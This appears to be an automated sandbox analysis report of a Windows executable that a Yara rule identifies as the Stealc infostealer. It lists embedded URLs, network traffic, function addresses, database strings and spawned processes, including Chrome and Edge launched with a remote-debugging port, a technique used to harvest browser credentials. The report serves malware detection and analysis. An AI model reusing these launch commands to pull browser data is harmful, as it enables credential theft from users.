Source: chromecache_86.5.dr String found in binary or memory: https://apis.google.com
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_86.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_86.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_86.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_86.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_86.5.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: gYjK72gL17.exe String found in binary or memory: https://sectigo.com/CPS0
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://support.mozilla.org
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_86.5.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_86.5.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_86.5.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org#
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49989 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
Contains functionality to call native functions
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C9EB700
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C9EB8C0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C9EB910
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C98F280
Detected potential crypto function
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9835A0 0_2_6C9835A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C996C80 0_2_6C996C80
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E34A0 0_2_6C9E34A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EC4A0 0_2_6C9EC4A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AD4D0 0_2_6C9AD4D0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9964C0 0_2_6C9964C0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C6CF0 0_2_6C9C6CF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98D4E0 0_2_6C98D4E0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C5C10 0_2_6C9C5C10
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D2C10 0_2_6C9D2C10
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9FAC00 0_2_6C9FAC00
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F542B 0_2_6C9F542B
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F545C 0_2_6C9F545C
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C995440 0_2_6C995440
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C0DD0 0_2_6C9C0DD0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E85F0 0_2_6C9E85F0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9B0512 0_2_6C9B0512
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AED10 0_2_6C9AED10
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99FD00 0_2_6C99FD00
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A5E90 0_2_6C9A5E90
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EE680 0_2_6C9EE680
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E4EA0 0_2_6C9E4EA0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98BEF0 0_2_6C98BEF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99FEF0 0_2_6C99FEF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F76E3 0_2_6C9F76E3
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C7E10 0_2_6C9C7E10
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D5600 0_2_6C9D5600
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E9E30 0_2_6C9E9E30
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A9E50 0_2_6C9A9E50
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C3E50 0_2_6C9C3E50
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D2E4E 0_2_6C9D2E4E
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A4640 0_2_6C9A4640
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98C670 0_2_6C98C670
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F6E63 0_2_6C9F6E63
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D77A0 0_2_6C9D77A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9B6FF0 0_2_6C9B6FF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98DFE0 0_2_6C98DFE0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C7710 0_2_6C9C7710
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C999F00 0_2_6C999F00
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9B60A0 0_2_6C9B60A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F50C7 0_2_6C9F50C7
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AC0E0 0_2_6C9AC0E0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C58E0 0_2_6C9C58E0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C997810 0_2_6C997810
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9CB820 0_2_6C9CB820
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D4820 0_2_6C9D4820
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A8850 0_2_6C9A8850
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AD850 0_2_6C9AD850
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9CF070 0_2_6C9CF070
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C5190 0_2_6C9C5190
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E2990 0_2_6C9E2990
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BD9B0 0_2_6C9BD9B0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98C9A0 0_2_6C98C9A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AA940 0_2_6C9AA940
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9DB970 0_2_6C9DB970
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9FB170 0_2_6C9FB170
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99D960 0_2_6C99D960
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9FBA90 0_2_6C9FBA90
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99CAB0 0_2_6C99CAB0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F2AB0 0_2_6C9F2AB0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9822A0 0_2_6C9822A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9B4AA0 0_2_6C9B4AA0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C8AC0 0_2_6C9C8AC0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A1AF0 0_2_6C9A1AF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9CE2F0 0_2_6C9CE2F0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C9A60 0_2_6C9C9A60
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98F380 0_2_6C98F380
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F53C8 0_2_6C9F53C8
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9CD320 0_2_6C9CD320
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C985340 0_2_6C985340
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99C370 0_2_6C99C370
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: String function: 6C9C94D0 appears 90 times
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: String function: 6C9BCBE8 appears 134 times
PE / OLE file has an invalid certificate
Source: gYjK72gL17.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: gYjK72gL17.exe, 00000000.00000002.2614193675.000000006CC25000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs gYjK72gL17.exe
Source: gYjK72gL17.exe, 00000000.00000002.2613919289.000000006CA12000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs gYjK72gL17.exe
Uses 32bit PE files
Source: gYjK72gL17.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@28/48@4/5
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C9E7030
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\3KC1D7XT.htm Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: gYjK72gL17.exe, 00000000.00000003.2439812181.0000000009AED000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000003.2303794092.0000000009AFB000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJECFIDHJJKKFC.0.dr, GCGHJEBGHJKEBFHIJDHC.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: gYjK72gL17.exe ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Users\user\Desktop\gYjK72gL17.exe "C:\Users\user\Desktop\gYjK72gL17.exe"
Source: C:\Users\user\Desktop\gYjK72gL17.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2324,i,1475862429204762952,15165259420851730460,262144 /prefetch:8
Source: C:\Users\user\Desktop\gYjK72gL17.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2320,i,3391580961989094564,10660087592265685708,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2188,i,279746520434431833,257325066205650014,262144 /prefetch:3
